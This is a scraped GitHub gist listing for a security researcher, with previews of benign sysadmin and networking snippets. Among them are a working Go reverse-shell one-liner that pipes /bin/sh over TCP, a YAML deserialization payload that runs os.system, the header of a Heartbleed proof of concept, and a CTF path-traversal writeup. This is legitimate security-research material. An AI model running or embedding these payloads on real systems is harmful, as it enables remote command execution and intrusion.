takeshix takeshixx

@takeshixx
takeshixx / ubuntu-xenial-armfh-qemu.md
Last active Sep 20, 2019
Running Ubuntu 16.04.1 armhf on Qemu
View ubuntu-xenial-armfh-qemu.md

Running Ubuntu 16.04.1 armhf on Qemu

This is a writeup about how to install Ubuntu 16.04.1 Xenial Xerus for the 32-bit hard-float ARMv7 (armhf) architecture on a Qemu VM via Ubuntu netboot.

The setup will create an Ubuntu VM with LPAE extensions (generic-lpae) enabled. However, this writeup should also work for non-LPAE (generic) kernels.

The performance of the resulting VM is quite good, and it allows VMs with >1G RAM (compared to 256M on versatilepb and 1G on versatile-a9/versatile-a15). It also supports virtio disks, whereas versatile-a9/versatile-a15 only support SD cards via the -sd argument.

Get netboot files

@takeshixx
takeshixx / hb-test.py
Last active Jul 20, 2019
OpenSSL heartbeat PoC with STARTTLS support.
View hb-test.py
#!/usr/bin/env python2
"""
Author: takeshix <takeshix@adversec.com>
PoC code for CVE-2014-0160. Original PoC by Jared Stafford (jspenguin@jspenguin.org).
Supports all versions of TLS and has STARTTLS support for SMTP, POP3, IMAP, FTP and XMPP.
"""
import sys,struct,socket
from argparse import ArgumentParser
View parser.c
#include <uapi/linux/ptrace.h>
#include <net/sock.h>
#include <bcc/proto.h>
#define ETH_HLEN 14
/*eBPF program.
Filter Packets
return 0 -> DROP the packet
return -1 -> KEEP the packet and return it to user space (userspace can read it from the socket_fd )
@takeshixx
takeshixx / csgoblog.py
Last active Dec 5, 2018
Poll CS:GO blog for new blog posts.
View csgoblog.py
#!/usr/bin/env python3
import sys
import time
import requests
import smtplib
import email.message
from lxml import html
SMTP_HOST = 'localhost'
SMTP_PORT = 25
@takeshixx
takeshixx / shell.go
Last active Oct 30, 2018
Golang reverse shell
View shell.go
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","127.0.0.1:1337");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run();}'>/tmp/sh.go&&go run /tmp/sh.go
@takeshixx
takeshixx / asyncio_ssl_example.py
Created May 12, 2016 — forked from messa/asyncio_ssl_example.py
Python asyncio + SSL TCP client/server example
View asyncio_ssl_example.py
#!/usr/bin/env python3
import asyncio
import multiprocessing
import os
import ssl
from time import sleep
port = 9000
@takeshixx
takeshixx / contab-jails.sh
Last active Mar 22, 2017
Crontab script for FreeBSD Jails (update separate ports tree, run portaudit, check for port updates)
View contab-jails.sh
#!/usr/local/bin/zsh
JAIL_PORTS=/usr/jails/ports
SHELL=/usr/local/bin/zsh
PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin:/root/bin
SECTION=' * * * * * * '
DELIMITER='------------------------------'
portsnap -p $JAIL_PORTS fetch extract &>/dev/null || echo "Updating ports tree failed!"
echo "# VULNERABILITIES"
@takeshixx
takeshixx / 33C3
Created Dec 27, 2016
33C3 WPA2 802.1X config for netctl
View 33C3
Description='33C3 WPA2 802.1x WiFi'
Interface=wlp4s0
Connection=wireless
Security=wpa-configsection
IP=dhcp
Essid=33C3
WPAConfigSection=(
'ssid="33C3"'
'proto=RSN WPA'
'key_mgmt=WPA-EAP'
@takeshixx
takeshixx / wtf.md
Last active Sep 19, 2016
CSAW CTF 2016 wtf.sh Writeup
View wtf.md

CSAW CTF 2016 wtf.sh Writeup

wtf.sh was a challenge that included two flags, one for 150pts and one for 400pts.

wtf.sh (1) (150pts)

In the first part we needed to call the function get_flag1 in order to receive the flag. The post parameter of post.wtf was vulnerable to a path traversal:

GET /profile.wtf?user=../posts HTTP/1.1
View yamlexec.py
yaml.load('!!python/object/apply:os.system ["id"]')